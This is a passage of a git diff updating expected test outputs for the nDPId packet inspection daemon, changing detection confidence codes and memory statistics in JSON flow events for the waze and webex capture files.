-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -235,9 +235,9 @@ ~~ total active/idle flows...: 33/33 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5996472 bytes -~~ total memory freed........: 5996472 bytes -~~ total allocations/frees...: 118939/118939 +~~ total memory allocated....: 6130106 bytes +~~ total memory freed........: 6130106 bytes +~~ total allocations/frees...: 121701/121701 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 1348 chars diff --git a/test/results/webex.pcap.out b/test/results/webex.pcap.out index 637458656..e91355ec5 100644 --- a/test/results/webex.pcap.out +++ b/test/results/webex.pcap.out 
@@ -4,14 +4,14 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1444570624853,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570624853,"pkt":"ABoRAAACABoRAAABCABFAAA8OXNAAEAGTZUKCAABQERpZ6GCAbtPGIcMAAAAAKACOQgjFwAAAgQFtAQCCAoATL5\/AAAAAAEDAwY="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoAQ5AABAGtg5ARGlnCggAAQG7oYKw53jzTxiHDVAS\/\/9Y4AAA"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoOXRAAEAGTagKCAABQERpZ6GCAbtPGIcNsOd49FAQOQgf2QAA"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) 
Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570627404,"flow_last_seen":1444570627404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570627404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1444570627404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570627404,"pkt":"ABoRAAACABoRAAABCABFAAA8hnNAAEAGAJUKCAABQERpZ6GEAbuwMDkNAAAAAKACOQgO\/QAAAgQFtAQCCAoATL9+AAAAAAEDAwY="} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1444570627409,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627409,"pkt":"ABoRAAACABoRAAABCABFAAAoASZAABAGtfZARGlnCggAAQG7oYRPz8bysDA5DlAS\/\/9Y3gAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1444570627410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627410,"pkt":"ABoRAAACABoRAAABCABFAAAohnRAAEAGAKgKCAABQERpZ6GEAbuwMDkOT8\/G81AQOQgf1wAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
